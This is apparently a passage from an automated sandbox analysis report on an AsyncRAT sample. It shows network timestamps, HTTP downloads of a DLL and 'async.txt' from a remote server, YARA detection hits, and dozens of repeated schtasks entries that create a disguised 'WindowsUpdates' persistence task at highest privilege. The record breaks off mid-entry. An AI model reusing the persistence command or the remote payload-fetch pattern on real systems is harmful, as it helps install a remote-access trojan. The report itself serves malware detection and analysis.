                Apr 19, 2024 11:38:26.731885910 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:26.732918978 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:26.906742096 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:26.906852007 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:27.092233896 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:37.709867001 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:37.889214993 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:37.889313936 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.021748066 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:38.068907022 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.200604916 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:38.201697111 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.383384943 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:38.383502960 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.569108009 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.194438934 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.375078917 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.375312090 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.507760048 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.553385019 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.685055971 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.685733080 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.872148991 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.872221947 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:50.058661938 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:51.005683899 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:51.053340912 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:51.185406923 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:51.240892887 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:00.678719997 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:00.850824118 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:00.851115942 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:00.988275051 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:01.037935972 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:01.169905901 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:01.170752048 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:01.343914986 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:01.344054937 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:01.529489040 CEST880849710204.12.199.30192.168.2.7
                • 204.12.199.30:20991
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.7 | 49708 | 204.12.199.30 | 20991 | 180 | C:\Users\user\Desktop\EGSh5caf8a.exe
                Timestamp | Bytes transferred | Direction | Data
                Apr 19, 2024 11:37:07.834968090 CEST | 86 | OUT | GET /hatthgola.vmp.dll HTTP/1.1
                Host: 204.12.199.30:20991
                Connection: Keep-Alive
                Apr 19, 2024 11:37:07.981703997 CEST | 329 | IN | HTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Content-Length: 16384
                Accept-Ranges: bytes
                Server: HFS 2.3m
                Set-Cookie: HFS_SID_=0.29210929851979; path=/; HttpOnly
                ETag: B8459C44E049F7AFE6D704515E12AB08
                Last-Modified: Sun, 24 Mar 2024 02:57:23 GMT
                Content-Disposition: attachment; filename="hatthgola.vmp.dll";


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.7 | 49709 | 204.12.199.30 | 20991 | 180 | C:\Users\user\Desktop\EGSh5caf8a.exe
                Timestamp | Bytes transferred | Direction | Data
                Apr 19, 2024 11:37:08.346025944 CEST | 54 | OUT | GET /async.txt HTTP/1.1
                Host: 204.12.199.30:20991
                Apr 19, 2024 11:37:08.495069027 CEST | 297 | IN | HTTP/1.1 200 OK
                Content-Type: text/plain
                Content-Length: 245760
                Accept-Ranges: bytes
                Server: HFS 2.3m
                Set-Cookie: HFS_SID_=0.644596335012466; path=/; HttpOnly
                ETag: 7765FE6EAB1CAD4FDE4F581EBDCEC9E6
                Last-Modified: Wed, 13 Mar 2024 13:18:06 GMT
                Content-Disposition: filename="async.txt";


                Target ID: 0
                Start time: 11:37:00
                Start date: 19/04/2024
                Path: C:\Users\user\Desktop\EGSh5caf8a.exe
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\Desktop\EGSh5caf8a.exe"
                Imagebase: 0x470000
                File size: 93'896 bytes
                MD5 hash: 712940BAEF78C821E36B8701BF073C52
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:13
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:14
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:15
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:16
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x7ff75da10000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:17
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:18
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:19
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:20
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:21
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:22
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:23
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:24
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:25
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:26
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:27
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:28
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:29
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:30
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:31
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:32
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:33
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:34
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:35
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:36
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:37
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:38
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:39
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:41
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:42
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:43
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:54 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:45
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:48
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:49
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:50
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:51
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
